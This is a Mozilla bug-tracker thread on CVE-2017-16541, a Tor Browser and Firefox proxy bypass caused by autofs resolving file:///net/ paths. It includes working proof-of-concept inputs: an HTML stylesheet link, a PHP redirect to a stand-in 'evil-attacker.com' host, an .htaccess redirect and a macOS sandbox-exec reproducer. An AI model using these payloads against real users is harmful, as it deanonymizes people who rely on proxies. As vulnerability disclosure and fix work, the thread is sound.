Closed Bug 1412081 Opened 2 years ago Closed Last year

(CVE-2017-16541) Proxy bypass caused by autofs on Mac, Linux

Categories

(Core :: Networking: File, defect, P2)

defect

Tracking


RESOLVED FIXED
mozilla63
Tracking Status
firefox-esr52 - wontfix
firefox-esr60 62+ fixed
firefox56 --- wontfix
firefox57 + wontfix
firefox58 + wontfix
firefox59 + wontfix
firefox60 - wontfix
firefox61 --- wontfix
firefox62 --- fixed
firefox63 --- fixed

People

(Reporter: arthur, Assigned: valentin, NeedInfo)

References


Details

(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage][adv-main62+][adv-esr60.2+])

Attachments

(6 files, 6 obsolete files)

1.90 KB, patch
Details | Diff | Splinter Review
27.55 KB, patch
Details | Diff | Splinter Review
1.27 KB, patch
jimm
: review+
Details | Diff | Splinter Review
27.56 KB, patch
Details | Diff | Splinter Review
29.73 KB, patch
Details | Diff | Splinter Review
963 bytes, patch
Details | Diff | Splinter Review
Tor Project received a third-party report of a method for content pages to bypass the proxy. STR:

Create a web page with the following:
<head>
<link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>
</head>

Run a "tcpdump port 111" on 12.12.12.12. UDP events are observed that did not pass through the browser proxy.

(A demo is at https://pearlcrescent.com/tor/am.html)

I also observed the same thing for <img> tags. This behavior apparently is caused by automount/autofs, which is enabled by default on macOS and installable on Linux.

More information from a colleague:

My quick test on OSX 10.12.x shows that Chrome and Safari (latest versions) are not affected.

It is also interesting that I see the following message in the browser console after the page load completes (i.e., after it gives up on the automounted file):

Security Error: Content at https://pearlcrescent.com/tor/am.html may not load or link to file:///net/192.168.1.43/a.css.

Access is blocked (i.e., the CSS does not load, the image does not load), but only after an attempt has been made to open the file (or maybe just traverse its path).
Ouch, I was able to reproduce. There seems to me to be three things going on here:

a) Why are we loading pages that will generate security errors?

b) Is an HTTP page triggering opening a file content process? If so, I think that's a bug, as those requests will always generate security errors. (I originally thought it was, but now that I see (c) it's possible this is all happening in the sandboxed process)

c) A kernel bug on macOS that lets sandboxed processes trigger automount; minimal reproducer:

sandbox-exec -p '(version 1) (deny default) (allow process-exec* (path "/usr/bin/stat")) (allow file-read* (subpath "/usr") (subpath "/System") (subpath "/private/var/db/dyld"))' /usr/bin/stat /net/12.12.12.12/a.css

I can see that triggering things in the TCP dump.
Arthur, do you or the original reporter want to report (c) to Apple, or shall I?
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #2)
> Arthur, do you or the original reporter want to report (c) to Apple, or
> shall I?

Feel free to do so.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #1)
> Ouch, I was able to reproduce. There seems to me to be three things going on
> here:
> 
> a) Why are we loading pages that will generate security errors?

For the stylesheet case at least, it seems like the security check is done after the stylesheet loader channel is created. That is probably okay for http: URLs (since creating the channel does not cause any network activity to occur in that case). But tracing through the code path underneath Loader::LoadSheet(), network activity occurs in the file:///net/...  case inside the nsFileChannel constructor. Specifically, the call to IsSymlink() hits the network, which is not too surprising since it must call stat() or lstat().

I am not familiar with all of this code, but somehow the security check needs to be done earlier.
That analysis sounds correct to me -- a stat is enough to trigger this. ni? Christoph, who I expect knows this code well.
Flags: needinfo?(ckerschb)
The "can web pages load file URLs?" check is done as part of the usual security checks (CheckMayLoad, CheckLoadURI, content policies like the mixed-content blocker and CSP), and given the eventual error message these are still happening. We've found a number of things recently that send extra loads that bypass those. In particular I wonder if this is some kind of preload/prefetch/preconnect speculative load from the parser that bypasses content checks on the incorrect theory "it's OK as long as we check before they end up in the document".

There are multiple prefs that turn off various preloads. Might not take too much time to diagnose whether those are involved or not.

Some of those are
  network.http.speculative-parallel-limit   (set to 0, though it should only be for http)
  network.dns.disablePrefetch               (again, file: isn't expected to need dns)

and others that appear to be turned off already, but maybe I missed one that's relevant for file: loads.
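For anyone who wants to rule these out quickly, both prefs can be forced from a user.js file. A minimal sketch (pref names are the ones listed above; this only disables the speculative mechanisms named in this comment, it is not claimed to be a fix):

```js
// user.js -- force off the speculative/prefetch mechanisms named above.
user_pref("network.http.speculative-parallel-limit", 0);
user_pref("network.dns.disablePrefetch", true);
```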
Group: core-security → network-core-security
Has STR: --- → yes
Whiteboard: [tor] → [tor][sec-high for Tor?]
Whiteboard: [tor][sec-high for Tor?] → [tor][sec-critical for Tor]
Adding a check to CheckMayLoad, CheckLoadURI, and/or possibly CheckLoadURIWithPrincipal prior to constructing the nsIChannel by calling NS_NewChannelWithTriggeringPrincipal in Loader::LoadSheet would likely solve this issue for attempting to load file: URIs as stylesheets, but would not solve it universally, if it exists elsewhere.

Another option is to bypass the stat checking when file uris are autofs uris on macOS and Linux, so file:///net/*. This would fix the problem for all instances with a file uri at a possible risk of symlink confusion breaking SOP (see bug 782581). Since that case dealt with other Android processes gaining access to sensitive content such as password and cookie databases, this may be safe to break in this one case.
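The autofs bypass described above would amount to a path-prefix test on the URL spec. A minimal sketch, assuming /net is the only automount root of interest and using plain std::string in place of Gecko's URI classes (note that string matching of this kind may be bypassable, as discussed elsewhere in this bug):

```cpp
#include <cassert>
#include <string>

// Hypothetical helper: true when a file: URL spec points under the /net
// automount root. Assumption: /net is the only autofs prefix of interest;
// real autofs maps are configured in /etc/auto.master and may differ.
static bool IsAutofsPath(const std::string& spec) {
  static const char kPrefix[] = "file:///net/";
  return spec.compare(0, sizeof(kPrefix) - 1, kPrefix) == 0;
}
```

A caller could skip the eager stat()/symlink resolution whenever this returns true, at the symlink-confusion risk noted above.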
(In reply to Kate McKinley [:kmckinley, :Kate] from comment #7)
> Adding a check to CheckMayLoad, CheckLoadURI, and/or possibly
> CheckLoadURIWithPrincipal prior to constructing the nsIChannel by calling
> NS_NewChannelWithTriggeringPrincipal in Loader::LoadSheet would likely solve
> this issue for attempting to load file: URIs as stylesheets, but would not
> solve it universally, if it exists elsewhere.

I think that seems a bit brittle to me. Arthur reproduced the issue with <img> tags as well.
 
> Another option is to bypass the stat checking when file uris are autofs uris
> on MacOS and Linux, so file:///net/*. This would fix the problem for all
> instances with a file uri at a possible risk of symlink confusion breaking
> SOP (see bug 782581). Since that case dealt with other Android processes
> gaining access to sensitive content such as password and cookie databases,
> this may be safe to break in this one case.

This sounds like the more promising approach to me right now.
Okay, I tried to verify whether Linux is actually affected by this and, surprisingly, I failed so far. Here is what I did on a Debian testing machine and an Ubuntu 14.04:

1) Installed the autofs package
2) Uncommented the /net -hosts line in /etc/auto.master
3) Restarted the machine
4) Captured traffic with tcpdump/wireshark going to a website with the PoC.
5) No non-Tor traffic showed up.

I did this both in Tor Browser and vanilla Firefox (pointed to a local Tor) with different settings.

Does anybody have different steps that show Linux is affected, too?
(In reply to Mark Smith (:mcs) from comment #4)
> For the stylesheet case at least, it seems like the security check is done
> after the stylesheet loader channel is created.

That is the case for all of our security checks in fact. We create a channel and once we call open2() or asyncOpen2() on the channel we perform the required security checks, because nothing should have hit the network until this point. Apparently you found a case where that's different. So your evaluation of the situation is accurate.

Since we already have the loadInfo available on the nsFileChannel we could use that information to figure out who triggered the load. I would imagine that the web never needs access to a local file and that any kind of upload scenarios (one would have to verify) are triggered by the SystemPrincipal. I hope that is the case, which would make sense. If all that is true then we could have a very hacky way of blocking. A very raw strawman patch could look like this:

--- a/netwerk/protocol/file/nsFileChannel.cpp
+++ b/netwerk/protocol/file/nsFileChannel.cpp
@@ -278,16 +278,24 @@ nsFileChannel::Init()
 #ifdef XP_WIN
   nsAutoString fileTarget;
 #else
   nsAutoCString fileTarget;
 #endif
   nsCOMPtr<nsIFile> resolvedFile;
   bool symLink;
   nsCOMPtr<nsIFileURL> fileURL = do_QueryInterface(mFileURI);
+
+  if (mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()) {
+    // potentially we could even check for http/https if necessary
+    // I am not entirely sure if we create codebasePrincipal for something
+    // other than web these days.
+    return error;
+  }

Obviously we could also do some kind of string matching to figure out the file:///net case, but I am not sure if there are other ways to bypass that string matching.
Flags: needinfo?(ckerschb)
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #10)
> (In reply to Mark Smith (:mcs) from comment #4)
> > For the stylesheet case at least, it seems like the security check is done
> > after the stylesheet loader channel is created.
> 
> That is the case for all of our security checks in fact. We create a channel
> and once we call open2() or also asyncOpen2() on the channel we perform the
> required security checks, because nothing should have hit the network until
> this point. Apparently you found a case where that's different. So your
> evaluation of the situation is accurate.
> 
> Since we already have the loadInfo available on the nsFileChannel we could
> use that information to figure out who triggered the load. I would imagine
> that the web never needs access to a local file and that any kind of upload
> scenarios (one would have to verify) are triggered by the SystemPrincipal. I
> hope that is the case, which would make sense. If all that is true then we
> could have a very hacky way of blocking. A very raw strawman patch could
> look like this:
> 
> --- a/netwerk/protocol/file/nsFileChannel.cpp
> +++ b/netwerk/protocol/file/nsFileChannel.cpp
> @@ -278,16 +278,24 @@ nsFileChannel::Init()
>  #ifdef XP_WIN
>    nsAutoString fileTarget;
>  #else
>    nsAutoCString fileTarget;
>  #endif
>    nsCOMPtr<nsIFile> resolvedFile;
>    bool symLink;
>    nsCOMPtr<nsIFileURL> fileURL = do_QueryInterface(mFileURI);
> +
> +  if (mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()) {
> +    // potentially we could even check for http/https if necessary
> +    // I am not entirely sure if we create codebasePrincipal for something
> +    // other than web these days.
> +    return error;
> +  }

This looks promising. However, I am not exactly sure that we have all the necessary things ready at this point looking at ESR 52 code. It seems to me bug 1319111 added all the changes you build upon. And backporting that one + all the dependent bugs seems unrealistic. Am I missing something (and if not what options do we have instead)?
 
> Obviously we could also do some kind of string matching to figure out the
> file:///net case, but I am not sure if there are other ways to bypass that
> string matching.

True. I'd rather avoid that if possible.
Flags: needinfo?(ckerschb)
Adding Filippo Cavallarin, the original bug reporter, to this bug.
(In reply to Georg Koppen from comment #9)
> Okay, I tried to verify whether Linux is actually affected by this and,
> surprisingly, I failed so far. Here is what I did on a Debian testing
> machine and an Ubuntu 14.04:

I was able to reproduce the problem on Debian Jessie.

> 
> 1) Installed the autofs package
> 2) Uncommented the /net -hosts line in /etc/auto.master
> 3) Restarted the machine
> 4) Captured traffic with tcpdump/wireshark going to a website with the PoC.
> 5) No non-Tor traffic showed up.

I did the same steps and I saw UDP traffic to the IP from the file:// path, on port 28416 (but not on port 111). However it only happens once, probably because the error is cached, so if I want to try it again I need to change the IP in the path.
(In reply to Georg Koppen from comment #11)
> This looks promising. However, I am not exactly sure that we have all the
> necessary things ready at this point looking at ESR 52 code. It seems to me
> bug 1319111 added all the changes you build upon. And backporting that one +
> all the dependent bugs seems unrealistic. Am I missing something (and if not
> what options do we have instead)?

I am adding Honza since he fixed Bug 1319111. Anyway, we added the triggeringPrincipal to the loadInfo within Bug 1083422 [1], which landed for FF35. In other words triggeringPrincipal information on the loadinfo for subrequest loads should definitely be accurate for ESR52. I don't fully understand why the final channel URL is important to fix the problem in this bug. As I understand it, if mFileURI [2] would point to e.g. file:///net then we would hit the network at the time we call ::init on nsFileChannel, right? So I don't think Bug 1319111 is relevant in any way for fixing this bug. But maybe I am missing something here.

[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1083422
[2] https://dxr.mozilla.org/mozilla-central/source/netwerk/protocol/file/nsFileChannel.cpp#285
Flags: needinfo?(ckerschb)
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #14)
> (In reply to Georg Koppen from comment #11)
> > This looks promising. However, I am not exactly sure that we have all the
> > necessary things ready at this point looking at ESR 52 code. It seems to me
> > bug 1319111 added all the changes you build upon. And backporting that one +
> > all the dependent bugs seems unrealistic. Am I missing something (and if not
> > what options do we have instead)?
> 
> I am adding Honza since he fixed Bug 1319111. Anyway, we added the
> triggeringPrincipal to the loadInfo within Bug 1083422 [1], which landed for
> FF35. In other words triggeringPrincipal information on the loadinfo for
> subrequest loads should definitely be accurate for ESR52. I don't fully
> understand why the final channel URL is important to fix the problem in this
> bug. As I understand it, if mFileURI [2] would point to e.g. file:///net
> then we would hit the network at the time we call ::init on nsFileChannel,
> right? So I don't think Bug 1319111 is relevant in any way for fixing this
> bug. But maybe I am missing something here.

Thanks. You probably don't. I was just wondering how to get the proper loadInfo in the constructor and how to abort properly before we hit the UDP leak.
(In reply to Georg Koppen from comment #15)
> Thanks. You probably don't. I was just wondering how to get the proper
> loadInfo in the constructor and how to abort properly before we hit the UDP
> leak.

You can simply access the member mLoadInfo (which is the current loadinfo of the file channel). To abort the load I assume you can just return any NS_ERROR_* (maybe NS_ERROR_FILE_TARGET_DOES_NOT_EXIST). I looked at other code within the ::init() function and it seems simply returning an error is all there is to do (once we know exactly what the condition for aborting is).
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #16)
> (In reply to Georg Koppen from comment #15)
> > Thanks. You probably don't. I was just wondering how to get the proper
> > loadInfo in the constructor and how to abort properly before we hit the UDP
> > leak.
> 
> You can simply access the member mLoadInfo (which is the current loadinfo of
> the file channel). To abort the load I assume you can just return any
> NS_ERROR_*. (Maybe NS_ERROR_FILE_TARGET_DOES_NOT_EXIST). I looked at other
> code within the ::init() function and it seems simply returning an error is
> all there is to do (once we exactly know what condition for aborting is).

Returning an error does not work as the compiler is complaining about doing so in a constructor. And just accessing `mLoadInfo` and doing things like you did in comment:10 (i.e. `mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()`) does not work as `mLoadInfo` is `null` it seems (if I am doing a `if (mLoadInfo)` the code in the if-clause is never executed). So, what did you have in mind (sorry if I am not following)?
Flags: needinfo?(ckerschb)
I am not sure, but it might work to add the check suggested by Christoph to nsFileProtocolHandler::NewChannel2().
(In reply to Georg Koppen from comment #17)
> Returning an error does not work as the compiler is complaining about doing
> so in a constructor. And just accessing `mLoadInfo` and doing things like
> you did in comment:10 (i.e.
> `mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()`) does not work
> as `mLoadInfo` is `null` it seems (if I am doing a `if (mLoadInfo)` the code
> in the if-clause is never executed). So, what did you have in mind (sorry if
> I am not following)?

Well, this is what I had in mind actually. The loadInfo should not be null at this point. Can we figure out why it is null? As Mark suggested, first we could check that we get the required arguments within newChannel2(). But maybe newChannel2 is not even called and the channel is created some other way. Further down within the ::init() method, mLoadInfo is even accessed, so I am surprised it's null.

Regarding returning the error within the ::init() method, that should work, because there is already code that does the same. Or are you really trying to do it in the constructor and not the ::init() method?
Flags: needinfo?(ckerschb)
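The constructor-vs-Init() point can be shown with a small stand-alone sketch: a C++ constructor cannot return an nsresult, so the fallible principal check has to run in a two-phase Init() after the loadinfo is set. All names here are illustrative stand-ins, not the real nsFileChannel API:

```cpp
#include <cassert>

typedef int nsresult;  // stand-in for Gecko's nsresult
const nsresult NS_OK = 0;
const nsresult NS_ERROR_FILE_TARGET_DOES_NOT_EXIST = -1;  // arbitrary stand-in value

class FileChannelSketch {
 public:
  // Constructor stays infallible; it only records state.
  FileChannelSketch() : mWebTriggered(false), mHaveLoadInfo(false) {}

  void SetLoadInfo(bool webTriggered) {
    mWebTriggered = webTriggered;
    mHaveLoadInfo = true;
  }

  // Fallible work goes here, after SetLoadInfo() has run, so we can
  // abort before any stat()/automount activity could happen.
  nsresult Init() {
    if (!mHaveLoadInfo || mWebTriggered) {
      return NS_ERROR_FILE_TARGET_DOES_NOT_EXIST;
    }
    return NS_OK;
  }

 private:
  bool mWebTriggered;
  bool mHaveLoadInfo;
};
```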
::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies that mLoadInfo is not nullptr.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #20)
> ::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies
> that mLoadInfo is not nullptr.

I agree but we need ESR 52 code for Tor Browser and there is no such thing in nsFileChannel.cpp.[1] I tried to work with Christoph's code there which gave me the results I mentioned in comment:17 and made me wonder in comment:15.

[1] https://dxr.mozilla.org/mozilla-esr52/source/netwerk/protocol/file/nsFileChannel.cpp#253
Ah, sorry, I missed the fact that we were talking about different versions.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #20)
> ::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies
> that mLoadInfo is not nullptr.

Bug 1319111 rearranged things like this:

instead of...

channel = new nsFileChannel(url) {
  // the code we want to patch
}
channel->SetLoadInfo(loadinfo)

...it does...

channel = new nsFileChannel(url) : mURL(url) {}
channel->SetLoadInfo(loadinfo)
channel->Init() {
  // the code we want to patch
}

You don't need to bother with the new resultPrincipalURI (not on esr52).



Regarding the codebase principal check, you should ask Boris, but I think we only use codebase principal for things we are about to load from unknown (and potentially unsafe) uris, but we may also use codebase principal for moz-extension (privileged, I think).

As I understand it, we later block the load in CSP. What exactly is that check doing? Could we move the whole check, or the part of it that detects the blocked load, here? To be on the safe side...
FWIW: I tested Christoph's patch in comment:10 in a Firefox 56 build and it solves the bug for me on Linux. I guess having a similar option for ESR 52 would be neat...
(In reply to Mark Smith (:mcs) from comment #18)
> I am not sure, but it might work to add the check suggested by Christoph to
> nsFileProtocolHandler::NewChannel2().

Partly, yes. The problem is that we hit the newChannel() call in `nsIOService::NewChannelFromURIWithProxyFlagsInternal()` without loadFlags. I guess what we can do is just return an error in our case if we hit that part. I've implemented that in a patch and I don't see the proxy bypass on my Linux box anymore. mcs/arthur: could you verify that on OS X as well (see the attached patch; I could not give its final version a test yet as I blew my build away accidentally and need to make a full new one, but am about to be afk)? Is there anything we'd blow up by deploying this workaround?
Flags: needinfo?(arthuredelstein)
(In reply to Georg Koppen from comment #25)
> see the attached patch

I don't think you attached anything
Flags: needinfo?(gk)
Here comes the mentioned patch.
Flags: needinfo?(gk)
(In reply to Tom Ritter [:tjr] from comment #26)
> (In reply to Georg Koppen from comment #25)
> > see the attached patch
> 
> I don't think you attached anything

Yeah, my browser crashed while uploading, sorry.
Flags: needinfo?(mcs)
Dan, would it be okay if we released a new Tor Browser with a functional workaround before this bug gets fixed properly, by being as unspecific as possible in our announcement and just including the code without any comments etc.? This is a critical issue for us.
Flags: needinfo?(dveditz)
(In reply to Georg Koppen from comment #25)
> (In reply to Mark Smith (:mcs) from comment #18)
> > I am not sure, but it might work to add the check suggested by Christoph to
> > nsFileProtocolHandler::NewChannel2().
> 
> Partly, yes. The problems is that we hit the newChannel() call in
> `nsIOService::NewChannelFromURIWithProxyFlagsInternal()` without loadFlags.
> I guess what we can do is do just return an error in our case if we hit that
> part. I've implemented that in a patch and I don't see the proxy bypass on
> my Linux box anymore. mcs/arthur: could you verify that on OS X as well (see
> the attached patch; I could not give its final version a test yet as I blew
> my build away accidentally and need to make a full new one but am about to
> be afk)? Is there anything we'd blow up by deploying this workaround?

I built Tor Browser alpha (based on ESR52) without and with the patch (23447a7a1b0), for OS X, and tested it as before. I can confirm that the patch stops the proxy bypass for both the CSS and <img> cases. I have also browsed to several sites with the patched version and didn't run into any problems.

Here are my branches:
https://github.com/arthuredelstein/tor-browser-build/commit/1412081
https://github.com/arthuredelstein/tor-browser/commit/1412081

Here are my builds in case anyone wants to try it:
https://arthuredelstein.net/stuff/1412081

And I applied the patch to the latest Firefox ESR52 and pushed to try. We'll see how it goes:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=6c475d223e9433df14c2728e7e1641b659b698be
Flags: needinfo?(arthuredelstein)
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #30)

> And I applied the patch to the latest Firefox ESR52 and pushed to try. We'll
> see how it goes:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=6c475d223e9433df14c2728e7e1641b659b698be

A lot of test failures turned up, so I am running the negative control (same branch minus the patch) to see which failures we can attribute to the patch:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=feaa5cdb3ccb
(In reply to Georg Koppen from comment #29)
> Dan, would it be okay if we released a new Tor Browser with a functional
> workaround before this bugs gets fixed properly

Please do!
Flags: needinfo?(dveditz)
Okay, we were about to release Tor Browser 7.0.9 with the attached workaround today but Filippo and Nicolas found ways to bypass it. So we stopped.

I don't have a URL handy to test for those new attack vectors but they seem to involve redirect mechanisms. Just pointing a victim to a PHP file containing:

<?php
header("Location: file:///net/evil-attacker.com/a.css");
?>

is supposed to be enough; alternatively, creating an .htaccess file with the line

Redirect / file:///net/11.11.11.14/a.css
Flags: needinfo?(mcs)
The problem seems to be that the codebase principal check is failing in the redirect case. Christoph: Do we have a different check we could use for both redirect/non-redirect cases? Just using the triggering principal check and preventing channel creation in that case seems to be the nuclear option, as it makes file:// unusable.
Flags: needinfo?(ckerschb)
Honza: Or maybe we could/should do something else for the redirect case?
Flags: needinfo?(honzab.moz)
I made a patch that blocks redirects from http(s) to file:// URIs. I'm not sure if it's the ideal approach, but I think it might be a reasonable stopgap for Tor Browser:
https://github.com/arthuredelstein/tor-browser/commit/1412081_redirect

Here's the build:
https://arthuredelstein.net/stuff/1412081/TorBrowser-7.5a6-osx64_en-US_redirect_patch.dmg
https://arthuredelstein.net/stuff/1412081/TorBrowser-7.5a6-osx64_en-US_redirect_patch.dmg.asc

(Note this doesn't include Georg's other patch. Both patches will be needed to block everything.)
Flags: needinfo?(honzab.moz)
Dan, under what circumstances do we want to allow an http redirect to a file? I can't think of any off the top of my head (and didn't think we ever allowed it, but apparently that's not true). We can certainly block it right in the http channel code if there isn't some use case to support.
A simple test showed that we do, as expected, block http->file redirects. For a quick fix we could add the simple scheme check as suggested in comment 36 to prevent creation of the file channel.

I can't think, off the top of my head, of a general check that would run the CheckMayLoad checks before we do stat() on the file.
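A minimal sketch of such a scheme check, with plain strings standing in for nsIURI (illustrative only; real code would hook into the redirect path before the file channel is created):

```cpp
#include <cassert>
#include <string>

// Hypothetical check run on redirect: block http(s) -> file: before any
// file channel exists. In Gecko this would consult the old channel's URI
// scheme and the redirect target's scheme (e.g. via SchemeIs()).
static bool ShouldBlockRedirect(const std::string& fromScheme,
                                const std::string& toScheme) {
  return (fromScheme == "http" || fromScheme == "https") &&
         toScheme == "file";
}
```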
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #36)
> I made a patch that blocks redirects from http(s) to file:// URIs. I'm not
> sure if it's the ideal approach, but I think it might be a reasonable
> stopgap for Tor Browser:
> https://github.com/arthuredelstein/tor-browser/commit/1412081_redirect

I confirm this patch is fixing the redirect to file:// issue in a Linux build for me:
https://people.torproject.org/~boklm/p/1412081_redirect/tor-browser-linux64-7.5a7_en-US.tar.xz
https://people.torproject.org/~boklm/p/1412081_redirect/tor-browser-linux64-7.5a7_en-US.tar.xz.asc
At first I had trouble reproducing the HTTP redirect problem. For some reason the problem does occur reliably in the first/default tab in Tor Browser 7.0.x but I can always reproduce it in a new tab. Now I can confirm that the patch from comment #36 closes the HTTP redirect hole on macOS.

I wonder if there are other similar holes that need to be closed. Script-based techniques such as setting document.location seem to be caught early by existing code that calls ssm->CheckLoadURIFromScript(). I tried using a file:///net/... URL as the src for an <iframe> but that is also blocked early by existing code. I don't think FTP supports redirect to an arbitrary URL. Can anyone think of other protocols or techniques within HTTP or HTML that we should examine? I don't know what netwerk/protocol/gio does but at least that is not included in ESR52 (so it is not an immediate concern for Tor Browser).
(In reply to Mark Smith (:mcs) from comment #40)
> At first I had trouble reproducing the HTTP redirect problem. For some
> reason the problem does occur reliably in the first/default tab in Tor
> Browser 7.0.x ....

I meant to say "For some reason the problem does NOT occur reliably..." Sorry!
A couple of much weaker attacks I noticed:
1. The user could be induced to paste file:///net/11.11.11.14/a.css into the URL bar
2. Open an html page with <img src="file:///net/11.11.11.14/a.jpg">. Now choose Page Info, click on the item for the fake image, click "Save As" and choose a location to save the file.

#1 is perhaps a concern. For #1 the most promising fix I can think of is to blacklist URLs of the form "file:///net/*".

#2 seems unlikely to be a very useful attack vector, but perhaps it would be good to fix as well.
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #42)
> A couple of much weaker attacks I noticed:
> 1. The user could be induced to paste file:///net/11.11.11.14/a.css into the
> URL bar
> 2. Open an html page with <img src="file:///net/11.11.11.14/a.jpg">. Now
> choose Page Info, click on the item for the fake image, click "Save As" and
> choose a location to save the file.
> 
> #1 is perhaps a concern. For #1 the most promising fix I can think of is to
> blacklist URLs of the form "file:///net/*".
> 
> #2 seems unlikely to be a very useful attack vector, but perhaps it would be
> good to fix as well.

Thanks for those points. Yes, those are scenarios the final patch has to address, I agree. Especially #1. I think, though, we could release an update without addressing them (I am building right now a new Tor Browser including your redirect patch as well *fingers crossed*).
> I would imagine that the web never needs access to a local file

You would imagine wrong.  See http://searchfox.org/mozilla-central/rev/aa1343961fca52e8c7dab16788530da31aab7c8d/caps/nsIScriptSecurityManager.idl#129-134 for example.

> Dan, under what circumstances do we want to allow an http redirect to a file?

Again, see our explicit support for allowing some sites, controlled by prefs, to link to file:// URIs.

For the real underlying issue here, the basic problem is that file:// is so messed up, between symlinks, virtual filesystems, etc.  Some specific issues with them:

1)  Some of our security checks (e.g. CheckMayLoad) _require_ that symlinks be resolved 
    before a check is done, due to the fact that we treat files in the same dir as same-origin
    but symlinks can cross directory boundaries.  This obviously requires a stat().
2)  CheckMayLoad also needs to stat() files because it needs to treat file:///foo and file:///FOO
    as same-origin on case-insensitive filesystems.
3)  For this bug, it sounds like CheckLoadURI needs to happen _before_ we ever stat() the file.

This list is clearly not exhaustive.

To fix issues around symlinks, we resolve symlinks (and hence stat() the file) immediately in nsFileChannel::Init.  I urge everyone to read through bug 670514 to see why doing it fully lazily (and not caching the stat() results) does not work.  That said, we could consider doing it as part of the AsyncOpen security-check process, instead of Init(), and make sure that it happens after the CheckLoadURI call.  I _think_ that should avoid regressing the issues from bug 670514 while allowing us to fix this bug.

I should note that until we moved CheckLoadURI into the channel code, this was slightly less of an issue, because we did not create the channel until _after_ CheckLoadURI passed.  I don't know whether CheckLoadURI still involved a stat() at that point or not.  We would need to check whether it does one.

We definitely need to ensure that we do not ever _read_ the file (including for "symlink resolution" or Windows equivalent) until after CheckLoadURI passes in the cases in which reading the file is already a failure (various /dev/tty bits on Linux, Windows special files that hang or crash the process when read, etc).

> 1. The user could be induced to paste file:///net/11.11.11.14/a.css into the URL bar

True.  The user could also be induced to paste "touch /net/11.11.11.14/a.css" into their terminal... I think fundamentally having autofs enabled is pretty prejudicial to fully controlling your network access.  :(

> Now choose Page Info, click on the item for the fake image, click "Save As" and choose a location to save the file.

Right, there's a fundamental tension here between "the page is not allowed to link there" and "the user wants to get the data"...  It's worth looking at the history of whether page info ever enforced CheckLoadURI checks on the "Save As" functionality in its media tab and thinking about whether it should.
(In reply to Patrick McManus [:mcmanus] from comment #37)
> Dan, under what circumstances do we want to allow an http redirect to a
> file? I can't think of any off the top of my head (and didn't think we ever
> allowed it.. but apparently that's not true.). We can certainly block it
> right in the http channel code if there isn't some use case to support..

Something interesting I observed is that, without the patch in comment 36, some UDP events are detected at the target server, but that is followed by a Security Error appearing in the web console claiming the redirect is not permitted. So it appears the intention was already to cancel (most) redirects from http to file:///, but the cancellation happens too late to prevent some network leakage. So, in the final patch, the existing code that prevents redirects to file:/// (and takes certain prefs into account, as mentioned by Boris) perhaps needs to be moved to a new location so that cancellation happens earlier.
(In reply to Georg Koppen from comment #34)
> The problem seems to be that the codebase principal check is failing in the
> redirect case. Christoph: Do we have a different check we could use for both
> redirect/non-redirect cases? Just using the triggering principal one and
> preventing channel creation in that case already seems to be the nuclear
> option as it makes file:// unusable.

I think Boris added a bunch of very valuable information within comment 44. Probably it's best we don't do stat() within ::init() but instead move it to asyncOpen2, or more precisely to the contentSecurityManager right after we perform the CheckLoadURI check.
Flags: needinfo?(ckerschb)
Tracking this for 57. It's late in the release cycle but we could still uplift for the RC build(s).
Apple requests that we not mention the sandbox-bypass with /net when this is resolved.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #48)
> Apple requests that we not mention the sandbox-bypass with /net when this is
> resolved.

Which reminds me: shouldn't such a thing get caught by the Linux sandbox as well (ideally)?
I would have expected it to; adding :gcp to see what the deal is there.
Flags: needinfo?(gpascutto)
Flags: needinfo?(gpascutto)
From conversation, the Linux sandbox "catches" and blocks that stat() from content, but resolving what is actually being stat()ed, to see if it's allowed, leads to the information leak happening on the chrome side. Content will be told the path is not allowed, but of course by then the damage is done.

It's reasonable to suspect the macOS kernel bug works along similar lines.
Summary: Proxy bypass caused by autofs on Mac, Linux → (CVE-2017-16541) Proxy bypass caused by autofs on Mac, Linux
Priority: -- → P2
Whiteboard: [tor][sec-critical for Tor] → [tor][sec-critical for Tor][necko-triaged]
See Also: → 1413868
Are there strong voices against disabling file: URI loading *completely* via a preference that the Tor browser could set?  It would be a solution for similar bug 1413868 too.
Do we have UI resources that load from file:// URIs?

If we only want to disable it from web pages, seems like an extension could easily do that...
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #53)
> Do we have UI resources that load from file:// URIs?
> 
> If we only want to disable it from web pages, seems like an extension could
> easily do that...

We can substitute internally to file:// (moz-ext:, resource:, jar:?), so general disabling is not possible, right.  

We want to disable only: top level loads (typing in address bar, command line, link clicks), iframes, subresources, general redirects-to, something else?

The distinction could be system principal, but I'm not sure if there can be a case of a system-principal load that is user/content-controlled and not application-controlled.
Apple have notified me that they believe this is fixed in the macOS 10.13.3 beta -- once that's released (they didn't provide a date) we can disclose the bypass mechanism if we like.
Whiteboard: [tor][sec-critical for Tor][necko-triaged] → [tor 24052][sec-critical for Tor][necko-triaged]
This is fixed in today's macOS 10.13.3 release.
Assignee: nobody → arthuredelstein
Priority: P2 → P1
Now that this is resolved in macOS, I'd like to go about upstreaming to Firefox the improvements tor landed to refuse to access file:// resources earlier.

Arthur, is that something on your roadmap, or would it be helpful if I took that on? And if the latter, do you have a link to the patches that tor is currently applying for this?
Flags: needinfo?(arthuredelstein)
